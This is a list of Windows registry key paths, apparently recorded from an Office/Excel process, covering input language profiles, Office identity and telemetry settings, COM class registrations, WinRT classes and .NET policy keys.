HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{591AE943-56BE-48F6-8966-06B43915CC5A}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{591AE943-56BE-48F6-8966-06B43915CC5A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{5FB02EC5-0A77-4684-B4FA-DEF8A2195628}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{5FB02EC5-0A77-4684-B4FA-DEF8A2195628}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile\0x0000ffff
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile\0x0000ffff\{6A114E62-E11B-447F-9A58-2D354F5C9204}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile\0x0000ffff\{6A114E62-E11B-447F-9A58-2D354F5C9204}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}\Enable
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToNexus
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableOneAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableExchangeOnPremModernAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAuthentication
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\SignIn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SignIn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\LiveIdServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\SpoServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\ADALServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\AadServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\AuthContextToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\BadgerServerToServiceParams
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ScriptRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\IdentityRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Canary
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Identities
HKEY_CURRENT_USER\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutOneAuthMigrationComplete
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\CredStoreKeyToAuthScheme
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\CredStoreKeyToAuthScheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\CredStoreKeyToAuthScheme\https://odc.officeapps.live.com
HKEY_CURRENT_USER\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_USERS\S-1-5-21-2527171340-3306644326-1278290521-1001_Classes
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\GELPrefs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\GELPrefs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Profiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\SpoAuthenticatorHeaderEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\IsOnRequestCompletedActivityEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\OLicenseCleanup
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaAppId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaLoginEndUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaSignInScope
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadClientId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadRedirectUri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadResourceId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedOneAuthAccountId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Diagnosis
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\Diagnosis
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
HKEY_CURRENT_USER\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ResourcePolicies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PackagedCom\TreatAsClassIndex\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\PackagedCom\TreatAsClassIndex\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PackagedCom\ClassIndex\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\PackagedCom\ClassIndex\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\CLSID\{0000034B-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Upgrades
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Policy\Upgrades
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\ErrorDialog
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Fod
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\FodConservativeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Research\Translation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\Permissions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\EnablePhoneOnlyAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ConfigEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\Url
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\Properties
